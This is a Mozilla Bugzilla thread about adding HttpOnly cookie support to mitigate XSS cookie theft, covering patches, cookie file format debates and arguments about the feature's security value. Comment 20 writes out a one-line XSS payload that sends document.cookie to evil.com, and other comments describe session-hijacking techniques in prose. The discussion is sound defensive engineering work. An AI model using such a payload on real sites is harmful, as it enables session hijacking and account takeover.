Closed Bug 178993 Opened 22 years ago Closed 18 years ago
MSIE-extension: HttpOnly cookie attribute for cross-site scripting vulnerability prevention
Categories: Core :: Networking: Cookies (enhancement)
Status: RESOLVED FIXED
Target Milestone: mozilla1.9alpha1
People: Reporter: jpranevich; Assigned: avva
Keywords: dev-doc-complete, fixed1.8.0.15, fixed1.8.1.5
Whiteboard: [sg:want] Comments 20-24 and 47 discuss how much this would help security in the face of a smart attacker
Attachments (6 files, 8 obsolete files)
(deleted), patch (benjamin: review+; dveditz: review+)
(deleted), patch (mvl: review+; mkaply: superreview+; dveditz: approval1.8.1.4-)
(deleted), patch (sayrer: review+)
(deleted), patch
(deleted), patch (mvl: review+; darin.moz: superreview+; dveditz: approval1.8.1.5+; asac: approval1.8.0.next+)
(deleted), patch (dwitte: review+; caillon: approval1.8.0.next+)
I feel very dirty, but it has some merit:
Internet Explorer 6.x has implemented an extension to the Set-Cookie HTTP header
which would mark a cookie as being readable only by the server and never by
scripting components of the client. This would make many types of cross-site
scripting vulnerabilities more difficult as "malicious" embedded code would be
unable to access sensitive cookies that the web server would not wish them to
have access to. (Imagine a hosting environment, like bugzilla, where you might
have authentication data stored in a cookie. If someone could inject bad JS into
the page-- possibly because there isn't enough tag stripping or something-- they
could act on those cookies, possibly by providing them to a third party which
might be able to use the information as a sort of simple identity theft. This is
a simplified example, but real-world cases exist.)
Of course, this is a purely client side restriction and, as such, has many
limitations anyway.
Excerpted from
http://msdn.microsoft.com/library/en-us/dncode/html/secure10102002.asp
The Microsoft Internet Explorer team came up with the idea of marking cookies as
scriptless. Think about what cookies are for a moment. They are opaque blobs
understood by the server, and not the client, and normally they should not be
accessed by client code. Most XSS attacks, but not all, involve cookie data
disclosure, and if a server could mark a cookie indicating that it should never
be accessed by the client, and have the client browser enforce this policy, it
would help mitigate the issue. Note, this does not mean you can continue to
write sloppy XSS-ridden code. Think of this cookie option as a small insurance
policy that helps reduce information disclosure threats and nothing more.
If Internet Explorer 6.0 SP1 (available in Microsoft Windows® XP SP1 and at the
Windows Update Site) detects a cookie marked HttpOnly and some client side
script code, such as JavaScript, attempts to read the cookie (document.cookie,
for example), Internet Explorer returns an empty string, thus preventing the
attack by preventing the malicious code in the XSS attack from sending the data
back to a malicious site. Of course, the cookie is passed to and from the
originating server as normal; the browser using script code just can't read it.
A cookie is set on the client with an HTTP response header. The following shows
the syntax used in this header:
Set-Cookie: <name>=<value>[; <name>=<value>]
[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]
Note, the HttpOnly attribute is not case sensitive.
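As a concrete illustration (the cookie name and value below are made up), a server protecting a session cookie this way would send:
Set-Cookie: SESSIONID=d34db33f; path=/; secure; HttpOnly
The browser still sends the cookie back on subsequent requests to the originating server, but script reading document.cookie does not get it.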
Comment 1•22 years ago
could be a nice enhancement
No need for the RFE since this is already marked as an Enhancement
Summary: [RFE] MSIE-extension: HttpOnly cookie attribute for cross-site scripting vulnerability prevention → MSIE-extension: HttpOnly cookie attribute for cross-site scripting vulnerability prevention
Comment 3•21 years ago
hmm... it looks like nsICookieService::[gs]etCookieStringFromHttp are only
called by the HTTP code, so we can use that to fix this bug (i.e., no API
changes required). we should probably make this a built-in (default)
policy instead of pushing the logic into the nsICookiePermission implementation.
dwitte: does this sound right to you?
Assignee
Comment 4•21 years ago
A few notes on this patch:
- against trunk, tested and appears to work fine
- the format of cookies.txt is extended (unavoidable, unfortunately, if the
HttpOnly status is to be preserved between sessions), but
nsCookieService::Read() continues to accept standard-style cookies.txt as well
- the new HttpOnly attribute of cookies is exported via nsICookie2 interface
(not the frozen nsICookie)
- APIs in nsCookieService aren't changed. The workhorse of finding/returning
cookies was GetCookieStringFromHttp and GetCookieString was calling it. Outside
cookie code, however, the only user of GetCookieStringFromHttp is the HTTP code
in netwerk/protocol/http/src/nsHttpChannel.cpp, and XSS/plugins/etc. all use
GetCookieString. So, to give the primary cookie-finding code the knowledge of
whether the cookie is requested by HTTP code or not, while avoiding changing
the exported APIs, the workhorse is now a new protected member
GetCookieStringInternal() (with an additional parameter specifying whether
HttpOnly cookies are to be returned) and both GetCookieString and
GetCookieStringFromHttp are thin wrappers around it.
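Roughly, the wrapper arrangement looks like this (a sketch only: the signatures approximate the nsICookieService methods and the bodies are illustrative, not copied from the patch):
NS_IMETHODIMP
nsCookieService::GetCookieString(nsIURI *aHostURI, nsIChannel *aChannel, char **aCookie)
{
  // non-HTTP callers (DOM script, plugins, etc.) come through here
  // and are never handed HttpOnly cookies
  return GetCookieStringInternal(aHostURI, nsnull, aChannel, PR_FALSE, aCookie);
}
NS_IMETHODIMP
nsCookieService::GetCookieStringFromHttp(nsIURI *aHostURI, nsIURI *aFirstURI,
                                         nsIChannel *aChannel, char **aCookie)
{
  // only the HTTP code calls this entry point, so HttpOnly cookies are included
  return GetCookieStringInternal(aHostURI, aFirstURI, aChannel, PR_TRUE, aCookie);
}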
I'm rather new to Mozilla code and will be grateful for any criticism or
reviews.
Comment 5•21 years ago
Comment on attachment 138799 [details] [diff] [review]
First attempt at fixing this bug; reviews would be appreciated
nice patch! it pretty much looks fine to me, sans a few nits.
>+ // if what we have at httpOnlyIndex is TRUE or FALSE, this is a
>+ // HttpOnly field, otherwise it's the expiration field.
>+ isHttpOnly = PR_FALSE;
>+ expiresIndex = nextIndex;
>+ if (Substring(buffer, httpOnlyIndex, nextIndex - httpOnlyIndex - 1).Equals(kTrue))
>+ isHttpOnly = PR_TRUE;
>+ else if (Substring(buffer, httpOnlyIndex, nextIndex - httpOnlyIndex - 1).Equals(kFalse))
>+ isHttpOnly = PR_FALSE;
>+ else expiresIndex = httpOnlyIndex;
put the |else| on its own line?
>+// helper function for GetCookieStringInternal
>+static inline PRBool ispathdelimiter(char c) { return c == '/' || c == '?' || c == '#' || c == ';'; }
>+
>+
ubernit, you've got one extra newline here.
>+NS_IMETHODIMP
you want |nsresult| here, not NS_IMETHODIMP... internal methods don't need to
be virtual.
>+nsCookieService::GetCookieStringInternal(nsIURI *aHostURI,
>+ nsIURI *aFirstURI,
>+ nsIChannel *aChannel,
>+ PRBool isHttpBound,
the convention is to prefix method parameters with |a|, so call this
|aIsHttpBound|?
>Index: cookie/src/nsCookieService.h
>===================================================================
>+ NS_IMETHODIMP GetCookieStringInternal(nsIURI *aHostURI, nsIURI *aFirstURI, nsIChannel *aChannel, PRBool isHttpBound, char **aCookie);
... and you want |nsresult| here too of course. (note that if you did actually
want it to be a virtual xpcom-ified method, you would use NS_IMETHOD to declare
the prototype in the .h file... not NS_IMETHODIMP. the latter is used in the
.cpp when you actually implement it.)
now of course, this patch will destroy backward compatibility of cookie files,
so if a user goes from 1.7 back to an older version, the older version will
just clobber their cookie file. i'll give r= on this patch, but i think we
should hold off on landing it until we get a cookie file versioning system
similar to what mvl's doing in permissionland. i'm on holiday until the 19th
though, so if someone wants to do this all for 1.7a, be my guest ;)
Attachment #138799 - Flags: review+
Has anybody considered not changing the cookies.txt file at all and instead
maintaining a parallel file with additional cookie attributes? (and that file
could be upwards-compatible and versioned, etc, unlike the current cookies.txt
which is pretty much impossible to change)
That way you don't break wget/curl/old Mozillas and whatever else might parse
cookies.txt.
The only security risk is that http-only cookies received with new mozilla could
be used insecurely (exposed to client side scripts) by old mozilla. But current
mozilla is already "insecure" in that manner, so I don't feel that's something
to be concerned about.
Comment 8•21 years ago
Comment on attachment 138799 [details] [diff] [review]
First attempt at fixing this bug; reviews would be appreciated
>- * host \t isDomain \t path \t secure \t expires \t name \t cookie
>+ * host \t isDomain \t path \t secure \t httponly \t expires \t name \t cookie
I don't like that change of fileformat. It will cause problems when you use an
older version of mozilla with the new file. httponly becomes expires. I think
all your cookies will be lost. No good.
(It really will cause trouble. Been there, seen it).
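(For example, a line in the new format, with made-up values,
.example.com	TRUE	/	FALSE	TRUE	1174939130	sessionid	abc123
would be read by an old parser with the httponly column's TRUE landing in the expires field, so the cookie gets mangled or dropped.)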
So either we need to do something clever with the current format (obfuscate it
in some other field) or get a new file, like cookies2.txt. If we do that,
consider other changes too, like an extra field to store the last use date of a
cookie, for better expiring when you have > 300 cookies. dwitte had some ideas
about it.
Comment 9•21 years ago
yep pretty much my thoughts exactly :)
so if someone wants to do said versioning and improvements for 1.7a, be my
guest, else this patch will have to wait for 1.8 when i get back from holiday.
Assignee
Comment 10•21 years ago
I'll gladly do whatever's necessary, if we can agree on what is to be done.
Currently the best idea seems to be:
- maintain a file in a new format, cookies2.txt
- leave cookies.txt in the current format
- on read, check for cookies2.txt, if it's not there, read from cookies.txt
(alternatively, compare timestamps if both are present? not sure which is best)
- on write, update both files (could this be a perf concern if the number of
cookies is large?)
- in the file itself, maintain two additional fields: boolean HttpOnly and a
timestamp of when the cookie was last used.
- have some versioning information in the file (stored how?)
If all these question marks can be resolved, I can update my patch to do this.
Comment 11•21 years ago
Losing all cookies is a bad thing. Missing some new or changed cookies when you
go back to an old version is not that bad. So comparing timestamps isn't needed
i think. Just read cookies2.txt if it is there.
For the same reason, i don't think writing cookies.txt is needed. We aren't
writing cookie2.txt either in old versions :)
If you do want it, it is acceptable to only do it when closing mozilla. In the
event of a crash, nothing is lost. Just start mozilla and close it, and
cookies.txt is up-to-date.
The 2 in cookies2.txt is a good versioning system :)
Before you make a new fileformat, talk to dwitte about other changes that need
to be made. I know about last-used date, but there might be more.
On the fileformat itself: It would be good if a file is extendable. You don't
want to go throught the same mess again in a few months just because some other
field needs to be added. But is is hard to do, because the file is read, then
the data is in memory, and then written out again. unknown data is discarded.
The storage in memory is quite efficent, so you can't just store all data you
can't parse.
So, find something clever (and tell me, for permissions), or make really sure
there isn't a need for an update in a loooong time. (maybe 2 unused boolean
fields? or a 0-255 int? there is some room in the bitfields)
Comment 12•21 years ago
well, this is 1.8a material, so i'll try to think about this more when i return
in a week.
i don't like the idea of a separate file with just the additional flags, but
depending on the importance of cookies.txt being world-parseable it might just
be the best way to go :/
Updated•21 years ago
Target Milestone: Future → mozilla1.8alpha
Comment 13•21 years ago
I'd like to suggest (as a lurker on this ticket)
1) make an extensible new cookie file format
2) maintain this new file and the old, fixed format cookies.txt file for some
time (newer Mozilla re-writes cookies.txt as a derivative of cookies2.txt)
3) announce that the old fixed format cookies.txt file is deprecated (encourage
wget/curl/etc. to begin supporting the new format)
I like the idea that newer Mozilla would only read the newer cookie2 file at
startup: cookies.txt would only be maintained as a derivative of cookies2.txt
for other apps that expect the old format.
For (1), XML would seem an obvious choice. This might even be the easiest option
to program in Mozilla, given the existing XML support. Another option might be a
format of one cookie per line, with tab-delimited name="value" pairs, where the
values are HTML escaped, e.g.
domain=".mozilla.org" secure="0" path="/" name="msg" value=""hi""
httponly="0" lastused="1074027797" usercomment="accepted because i trust them"
expires="1124027797"
As for loading unknown/unsupported attributes in memory: yes, that seems bad.
Solution: don't. When Mozilla closes, it can re-read cookies2.txt
(cookies2.xml?) and do a sort of "merge" of what it finds there (the old cookie
info) with what's in memory (the new cookie info): adding, modifying, or
deleting cookies' information as it goes.
A caveat for the extensible format: if Mozilla were to use some extensible
format, that would raise the possibility of two different versions of Mozilla
using cookie attributes unknown to each other. In such a case, having Mozilla
decide whether to preserve attributes it does not understand is problematic.
E.G.:
- Mozilla A might record whether the cookie was set by http or set by
client-side scripting ("setbyhttp") and how many times the cookie has been sent
("usecounter") while
- Mozilla B records the URL that set the cookie ("setterurl").
- Let's say both Mozilla A and Mozilla B support the "lastused" attribute.
Let's say a user accepts a cookie with Mozilla A, browses, then shuts down
Mozilla A. At this point, cookies2.txt has the setbyhttp="1" attribute recorded.
Now the user starts up Mozilla B and revisits the site. If nothing else about
the cookie changed, then Mozilla B, when it closes, should definitely write
information about all the attributes of the cookie that it supports, including
the new lastused attribute. Mozilla B cannot write a setterurl attribute, as it
doesn't know what URL set the cookie; it could record that attribute as empty,
or leave it out: either would be fine. But what should it do about the
"setbyhttp" and "usecounter" attributes that it does not understand? In my
name/value non-XML storage example above, Mozilla B would have no way of knowing
that "setbyhttp" is a attribute that only changes when the cookie is set (and
should be preserved) while "usecounter" is intended to be updated with use (and,
since Mozilla B does not do so, arguably should be discarded when Mozilla B
re-writes cookies2.txt). With XML I see at least a couple of approaches to
tackling this problem. Simplest would be XML that Mozilla B would write like this:
<cookie>
<cookie-attr name="domain" value=".mozilla.org"/>
<cookie-attr name="name" value="msg"/>
<cookie-attr name="value" value=""hi""/>
<cookie-attr name="lastused" value="1074027797"/>
<cookie-attr name="setbyhttp" value="1" preserved="1"/>
<cookie-attr name="usecounter" value="8365" preserved="1"/>
...
</cookie>
where the "preserved" atttribute of the "setbyhttp" and "usecounter" cookie-attr
elements would indicate that the version of Mozilla that wrote this XML had no
idea what those attributes meant. When Mozilla A ran again, it could decide
whether to accept the "preserved" attributes or discard them. A non-XML file
format could have something similar to the "preserved" marker attribute, of
course; it's just more difficult to design an extensible file that way.
XML or not, moving to an extensible cookie serialization file format gives
Mozilla more than just support for this HttpOnly extension -- it also makes
possible other features, like the last-use date that mvl mentioned in
http://bugzilla.mozilla.org/show_bug.cgi?id=178993#c8
Comment 14•21 years ago
the whole point is the merging. It can only be done by giving each cookie some
long, random, unique id. And merging would be a performance problem.
The code would be huge and likely ugly too.
Using xml is a problem, because afaik necko (where cookies live) doesn't depend on
the xml parser, and adding that dependency just for this is bad.
Anyway, i strongly suggest creating a new bug for the fileformat changes, make
this depend on it, to keep this bug for discussing the httponly thing.
Comment 15•21 years ago
Opening a new ticket & marking this as dependent on it sounds good to me.
Here's a quick suggestion for mimicking the "preserved" flag in a non-XML file:
domain=".mozilla.org" name="msg" ... ?setbyhttp="1" ?usecounter="8365"
Field names would be alphanumeric, and a "?" preceding a field name would
indicate that the Mozilla process writing the file had no idea what the value meant.
Comment 16•21 years ago
Filed as bug 230933. This bug is from now on only for httponly.
Updated•21 years ago
QA Contact: tever → cookieqa
Comment 17•20 years ago
Security should be a priority over a clean implementation. If there is a quick
hack that would enable this to be implemented, the dependency on bug 230933
should be removed to let this move forward.
Comment 19•20 years ago
Comment on attachment 138799 [details] [diff] [review]
First attempt at fixing this bug; reviews would be appreciated
no, it's not. i'm retracting my review on this due to subsequent discussion
(see comment 8) - we need a new fileformat to implement this. that's why this
bug is dependent on bug 230933.
whether we implement the new fileformat as a separate file that extends
cookies.txt, or as a replacement file, i'm undecided on. i'd prefer the latter
for cleanliness, but this discussion should take place in bug 230933.
Attachment #138799 - Flags: review+ → review-
Comment 20•20 years ago
HttpOnly does not fix the hole some people claim it fixes. Let's look at an
attack scenario that HttpOnly might appear to fix:
1. Attacker uses XSS or a same-origin hole to inject the following:
location = "http://evil.com/" + escape(document.cookie);
2. Attacker uses cookie to log into the site as you and send himself your money.
Here's how the attacker can get around HttpOnly:
1. Attacker uses XSS or a same-origin hole to inject a complicated script.
2. Complicated script opens an iframe to another page on the same site and uses
DOM to cause you to send money to the attacker.
HttpOnly is only useful when the cookie itself contains sensitive information
that does not appear on the site when you are logged in. An example is Slashdot
several years ago, which stored your password in a cookie. With your password,
an attacker can *change* your password; without your password, an attacker can
only masquerade as you as long as you leave the security hole open.
Comment 21•20 years ago
Indeed, HTTPOnly does not stop complex targeted attacks like you mention, but
that shouldn't be an excuse to leave low-hanging fruit. You are overlooking that
on any site that tracks the user's session with cookies, the cookie itself contains
sensitive information. This is the majority of sites now, including Bugzilla.
Hijacking a Bugzilla session is trivial. A user could upload a legitimate-
looking html attachment to a bug that sends the session data to the hacker, then
wait to get an admin's session. The only protection Bugzilla offers is that it
optionally ties the session to the IP address, but that won't work for users whose
IP changes between requests (AOL, corp proxies, etc).
HTTPOnly's value is that it makes session hijacking theoretically nearly
impossible. If you haven't, I suggest reading the Bugtraq thread after eEye's
attempt to hack it when it first came out in IE.
Comment 22•20 years ago
(In reply to comment #21)
> Indeed, HTTPOnly does not stop complex targetted attacks like you mention, but
> that shouldn't be an excuse to leave low hanging fruit.
There's no point in blocking simple automated attacks unless we can also block
complex automated attacks. The only thing it would accomplish is to give users
and web site owners a false sense of security.
> You are overlooking that
> on any site that tracks the users session with cookies, the cookie itself does
> sensitive information. This is the majority of sites now, including Bugzilla.
My Bugzilla cookie includes a login cookie and some prefs. The login cookie is
no more useful than the ability to control my browser at this domain. The prefs
can be inferred by loading a bug list and using the DOM. Thus, HttpOnly would
not keep any "sensitive information" from an attacker.
> Hijacking a Bugzilla session is trivial. A user could upload a legitimate
> looking html attachment to a bug that sends the session data to the hacker
> then wait to get an admin's session.
That's bug 38862. And it's irrelevant, because Bugzilla would be no less
vulnerable with HttpOnly.
> HTTPOnly's value is that it makes session hijacking theoretically nearly
> impossible. If you haven't, I suggest reading the Bugtraq thread after eEye's
> attempt to hack it when it first came out in IE.
What do you mean by "theoretically nearly impossible"? Did they argue that my
exploit wouldn't work? URL?
Comment 23•20 years ago
> 2. Complicated script opens an iframe to another page on the same site and uses
> DOM to cause you to send money to the attacker.
Doesn't this make the assumption that the attacker has intimate knowledge of the
DOM of the page they are trying to manipulate through the script? For
example, if I'd never seen the bugzilla admin screen, I couldn't write a script
to manipulate it through an XSS vulnerability. I realize I'm asking for
security through obscurity, but when that's the best you can do...
If several applications share a login cookie, and the attacker
finds an XSS he can use against you in one application but knows nothing about
how the other applications function, then he can't write a script to manipulate
them; but if he can steal my login cookie he can rummage through them from his
own browser as long as the session doesn't expire. I believe this alone makes this
bug worth fixing.
Comment 24•20 years ago
(In reply to comment #22)
> (In reply to comment #21)
> There's no point in blocking simple automated attacks unless we can also block
> complex automated attacks.
Until there is a universal javascript security spec, or browsers stop executing
anonymous javascript by default, the web will be fundamentally insecure. It's
been like that since js was introduced.
> The only thing it would accomplish is to give users
> and web site owners a false sense of security.
I am not being facetious, but I believe anyone advertising a secure browser, and
installing that browser with javascript enabled gives users a false sense of
security in the first place. It's just not possible to be 100% secure in today's
browser model with javascript on. I don't know of any proposed solution that
would stop the "ultimate" xss attack that uses the victim's browser itself as a
proxy for the attacker though (i've got some ie/moz proof of concept js that
does this bitrotting on some corner of my hd).
I am not privy to the Mozilla threat assessment (if one exists formally), but I
would hope it includes xss cookie hijacking via javascript as a highly rated
threat to sensitive data. I am also not aware of any thing that Mozilla or
Firefox do by default to mitigate this threat other than turning off javascript
entirely. It is undeniable that adding the HTTPOnly mitigation would make
Firefox a more secure browser if mitigated exploits are the metric.
Whether the added security is worth the dev time is something I cannot judge, but
HTTPOnly does add real value.
Comment 25•20 years ago
why not simply disallow js access to document.cookie using caps?
Comment 26•20 years ago
timeless: we used to have a UI pref for that and it broke sites.
Comment 27•20 years ago
jesse: we really need caps to have a logging system which lets users easily
build caps whitelists on a site controlled basis.
something like:
site foo tried to use:
[ ] document.cookie
if foo isn't working for you, then it might be because of restrictions currently
in place; checking some of the item(s) above may allow the site to work better.
Comment 28•20 years ago
The difference between http-only and caps is that http-only is set by the server
and caps is by the client.
http-only can be used if the author of the site knows his site may be vulnareble
to cross site scripting. I wonder how many sites actually use it.... Shouldn't
they just fix their site?
Comment 29•20 years ago
If we want to make this happen without the hassle of changing the format of
cookies.txt, there are several hacks we could do within the current format.
Which of them works correctly depends on the cookies.txt parsing code that's out
there - ours, wget's and any other.
We only need to insert a single bit of information in each line, so we could
indicate HTTP only by:
- Using the presence of trailing whitespace
- Using a change of case in the boolean TRUE/FALSE values
- Using /./ at the top of the path instead of /.
- Having each line followed by a comment line (beginning #) with extra data on it.
These are all nasty, but perhaps better than getting into the hassle of changing
the cookies.txt file format.
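For instance, the third trick (/./ in the path) could mark an HttpOnly cookie with a line like this, where the domain, expiry, name and value are made up and the columns are the usual host, isDomain, path, secure, expires, name, value:
.example.com	TRUE	/./	FALSE	1174939130	sessionid	abc123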
Gerv
Comment 30•19 years ago
Any chance of this landing for 1.1?
Comment 31•19 years ago
Of what landing? The attached patch is 18 months old and questions have been
raised over the implementation. Do you have an up-to-date working patch with
those issues addressed? :-)
Gerv
Assignee: avva → darin
Comment 33•19 years ago
Applied the original patch manually to current trunk, with requested changes.
Extends the cookies.txt file format with an extensible \t delimited line:
#mxa \t HttpOnly [\t <additional attr>]
Attributes set in an #mxa-prefixed line affect all cookies parsed afterwards.
Code that writes cookies.txt interleaves normal cookie lines with #mxa lines.
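For example (the cookie line itself is made up), the file might contain:
#mxa	HttpOnly
.example.com	TRUE	/	FALSE	1174939130	sessionid	abc123
with the #mxa line applying to the cookie line(s) parsed after it.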
Updated•19 years ago
Attachment #186756 - Flags: review?(dwitte)
Comment 34•19 years ago
My two quick concerns are:
- We only have one chance to extend the file format; are we certain we are doing
it in a way which allows further extensions later without breaking new parsing code?
- Would it make more sense to have a comment line per cookie? This "all
following cookies" feature makes future extensions much harder to write; what
happens if they apply to a different set of cookies?
I've pinged dwitte to try and get him to review.
Gerv
Comment 35•19 years ago
I'd like to review this, sorry for the delay. I should be able to get to it next
week.
Comment 36•19 years ago
The #mxa comment line is extensible. Additional \t separated attributes can be
added onto the line without breaking the format. I've tried it with a few bits
of random data (not exhaustive, however), and it should be backwards and
forwards compatible, provided any additional attributes added in the future
honor the pattern.
Right now, it is one #mxa line per cookie. Having an #mxa line affect all
cookies following it is a side effect of how the patch is implemented. It would
be fairly trivial to add code to reset #mxa attributes to defaults after every
cookie line.
Comment 37•19 years ago
I don't see how the code preserves any attributes added to the #mxa line when the
cookie file is written. The added attributes were not stored in memory, and the
writing code does not try to recover them.
So if a mozilla with this patch reads a file from an even newer mozilla which
added extra info to the #mxa line, that info is lost. So as far as i can see
it, the format is not extensible.
Comment 38•19 years ago
True, if an older version of Mozilla reads/writes the cookies.txt file, any new
#mxa attributes will be lost.
Incentive to write cookies.xml?
Comment 39•19 years ago
> Incentive to write cookies.xml?
No. If we are moving away from cookies.txt, we should move to mozStorage.
Comment 40•19 years ago
mvl: really? The easy parseability of cookies.txt by 3rd-party programs is not
something we should throw away lightly.
How about this: we switch to a new format, but reflect the contents into
cookies.txt at shutdown - so it's a read-only mirror of the data. I don't know
of any 3rd party apps which _update_ cookies.txt.
Gerv
Comment 41•19 years ago
Six Apart: I don't think there's anything inherent in the comment format you
chose which prevents you from writing forward-compatible parsing code which
just ignores attributes it doesn't know about.
If we are going to move to mozStorage, mvl needs to tell us exactly what it is,
where it's documented, and how much work it would be. :-) Otherwise, I'd rather
have a slightly hacky implementation now than wait another few years.
Gerv
Comment 42•19 years ago
mozStorage is our wrapper around sqlite. It lives in
http://lxr.mozilla.org/seamonkey/source/storage/public/ (at least the interfaces
you need live there)
The files it produces are binary, but using the sqlite libraries, they can be
read without too many problems by other apps.
The advantage is that you can add columns to the table without breaking readers
that don't know about them. (at least, if those readers are somewhat sane)
Comment 43•19 years ago
Comment on attachment 186756 [details] [diff] [review]
updated patch, uses cookies.txt comment-line trick
sorry for the delay. while the patch is a nice idea, i'm giving r- on it in
favor of moving to mozIStorage. the issue of writing out #mxa lines not
understood by the current browser version is significant as well.
i've spoken to vlad and darin about the status of storage. it's ready for
consumers now, and the plan is to migrate over to it for the 1.9 timeframe. at
that point we'll deprecate cookies.txt, but probably continue to write it out
so that 3rd party apps remain happy.
once 1.1 is out i'll get a handle on moving cookies to storage.
Attachment #186756 - Flags: review?(dwitte) → review-
Comment 44•19 years ago
one more thing - thanks for your efforts on this patch, Six Apart. if you're
interested in helping out with moving to storage, send me an email and i can try
to fill you in on what needs to be done.
further storage discussion will take place in bug 230933.
Comment 45•19 years ago
Okay, where should I start on implementing mozStorage for cookies?
Comment 46•19 years ago
> Okay, where should I start on implementing mozStorage for cookies?
You are great :-) A lesser man would have thrown up his hands in irritation. I
suggest you send Dan Witte an email.
Dan: both with cookies and bookmarks, I think we need to continue to make the
legacy file a read-only version of the mozIStorage store. Having both
human-readable is very useful.
Gerv
Updated•19 years ago
Whiteboard: [sg:want?] Comments 20-24 discuss how much this would help security in the face of a smart attacker
Updated•19 years ago
Whiteboard: [sg:want?] Comments 20-24 discuss how much this would help security in the face of a smart attacker → [sg:want] Comments 20-24 discuss how much this would help security in the face of a smart attacker
Comment 47•19 years ago
I was partly wrong in comment 20. HttpOnly does actually prevent attacks in certain cases due to differences between cookie domains and same-origin policy domains. In particular, it prevents attacks when all of the following conditions are met:
1. The pages with potentially malicious scripts are loaded from a subdomain, such as http://jesserud.livejournal.com/.
2. There are XSS holes, or the site has decided to allow scripts.
3. Login cookies are set to apply to subdomains (e.g. ".livejournal.com").
4. The use of the cookie on pages within the subdomain (including forms that submit to the main domain) is carefully restricted.
With HttpOnly, a malicious script loaded from my blog would still be able to cause you to post comments on my blog (impersonating you), but would not be able to change your account password, see private posts on your friend's blog, or post entries in your own blog. This might be the reasoning behind LiveJournal's recent decision to move each blog to its own subdomain (http://news.livejournal.com/90556.html).
Whiteboard: [sg:want] Comments 20-24 discuss how much this would help security in the face of a smart attacker → [sg:want] Comments 20-24 and 47 discuss how much this would help security in the face of a smart attacker
Comment 48•19 years ago
LiveJournal may be changing its cookies to avoid relying on HttpOnly:
http://www.davidpashley.com/cgi/pyblosxom.cgi/computing/livejournal-mozilla-bug.html
Comment 49•19 years ago
Hi, this is Brad from LiveJournal.
See bug 324253 comment 18. I know HttpOnly cookies aren't a complete solution to all XSS problems, but they're incredibly helpful in mitigating attacks when XSS attacks do come up.
As LiveJournal has continually updated its HTML cleaner over the past 3-4 years, it's ironically Internet Explorer users who have had the least account break-ins because their cookies haven't been stolen, while Safari/Mozilla have been vulnerable. Yes, it's kinda our fault for not having a perfect cleaner, but even a white-listing cleaner can't be perfect when new browser features are added all the time. It's a constant battle for us.
We've noticed HttpOnly's effectiveness for so long that we were the ones who sponsored Anatoly to add HttpOnly cookies in comment 4, over 2 years ago now.
While we could discuss forever that HttpOnly isn't a complete solution for all attack instances, that's not what matters. It's like saying, "Well, condoms don't _always_ work, so let's just not use anything!" HttpOnly does work most of the time, especially for stopping what our HTML/CSS spermicide doesn't.
Comment 50•19 years ago
You guys really need to add HttpOnly; you are really leaving us web developers out in the cold.
Please add it ASAP.
Comment 51•19 years ago
I just found some info about HttpOnly, and I'm impressed; it's very strange that you still haven't managed to implement such a useful feature.
It seems to me very useful for preventing password theft through XSS.
It's bad that my favorite browser still doesn't support it.
We (users & web developers) need this a lot.
This would stop, I think, 90% of password theft using XSS!
JavaScript and other client-side code really shouldn't have access to sensitive cookies.
Comment 52•18 years ago
WebDevs: One solution to this problem (lack of support for un-scriptable cookies) is to prepend a javascript-let to all your page responses which might potentially have user input being sent back to the client.
A simple example is below; note that for any private cookies which your server is sending with the HttpOnly flag (such as login-session or other token cookies), you should replace 'FOO' with the name of that cookie. The method of prepending the script to your page responses is an exercise for the reader and depends on your scripting language du jour.
if (document.cookie.indexOf('FOO=') != -1) {
  var warningMsg = 'Your Web Browser does not support \'HttpOnly cookies\', so viewing this page or filling in forms on this page may be a HIGH risk to your privacy and/or any login credentials. Please use an updated version of your browser, or try another browser if an update does not correct this. \n\nIf you logged-in to this site, for maximum security you should log out IMMEDIATELY';
  alert(warningMsg);
  // best-effort attempts to keep the rest of the page from loading or executing
  history.go(-1);
  window.close();
  document.write('<!--');
}
The last 3 statements in the above snippet may NOT work with all browsers and page loading scenarios ('top' windows, etc) and are only a best effort to keep the rest of the page from executing. The last statement in particular would be very easy for an XSS attack to counter, for example.
Regarding this RFE's earlier delays due to concerns about changing the cookies.txt format: why not just store the 'metadata' fields (i.e. HttpOnly) in another file and join them using hashtable keys? This would be (I believe) completely innocuous to older browsers (except for their disregard for the HttpOnly flag).
Comment 53•18 years ago
> Please use an updated version of your
> browser, or try another browser if an update does not correct this.
That's entirely unreasonable, given that your login credentials are only at risk if the site owner has messed up their site security and unsafe content filtering.
While the browser manufacturers can and should do what they can to help with this problem, at the end of the day the security of a site is the responsibility of the site owner alone.
Gerv
Comment 54•18 years ago
> That's entirely unreasonable, given that your login credentials are only at
> risk if the site owner has messed up their site security and unsafe content
> filtering.
Gerv, at the risk of repeating what you/we know (and to emphasize that logins and ID theft ARE at risk, though this RFE only partially addresses the problem):
1) 'Session fixation' / 'session hijacking' are (as we know) means wherein if a person is able to post javascript-able code to your site, they can 'steal' your login/session cookies, and masquerade as you on certain sites, then access your private data and even change your credentials. This includes but is not limited to webmail, bank sites, and many others... especially those sites which MUST allow users to upload (or attach) files.
2) site owners frequently MUST delegate portions of site development to less experienced (or under-pressure to deliver) developers, even a best effort to audit for holes in a large project can NEVER be fully trusted, because;
3) XSS thwarting is NOT limited to encoding user input -- some sites REQUIRE that the user can upload files, or html content (webmail) from 3rd parties. These are not trivial to sanitize, and traditional HTML/JS/URL encoding cannot be used.
4) When file uploads are required, there are way too many attack vectors (ha.ckers.org/xss.html lists a SMALL subset of them)... even the most experienced developers cannot be expected to mitigate them all.
5) No mitigation strategy -- or API -- (that I have found) has been published or otherwise endorsed by CERT, etc, to sanitize file uploads or webmail, for example. No public litmus test exists, either (to my knowledge)
6) Currently few or no server APIs enforce HTML/Javascript meta conversion response-methods.
7) Server APIs which tie the session cookie to IP address or agent-string are few, and have limited effectiveness (NATs, proxies)
Cookie theft is the most widely used threat since it is the easiest to accomplish and defeats SSL and obviates UI spoofing techniques altogether, and because the hole -- and intrusion -- are VERY difficult to detect. And fundamentally because so many sites bind the login to the session. But I agree that XSS UI spoofing (iframes) and form theft would NOT be addressed by this ('HttpOnly' cookie) RFE...
But some or all of these problems can ONLY be fully/safely addressed by the browser (NOT by the site). For example if a new <httponly> or <scriptoff> block could be wrapped around a file upload that a viewer views, and disable any scripts (embedded or SRC) inside of that block. That would be much, much easier and more bullet proof than the site trying to sanitize all attack vectors on file uploads or webmail. That would be the subject of a separate RFE though.
Comment 55•18 years ago
HttpOnly feels like a fairly clumsy Web 1.0 solution. I don't object to it being added, but I think a better solution in the long term would be to implement something like the following:
1) No-Cookies-Allowed header (for entirely foreign pages, like uploads)
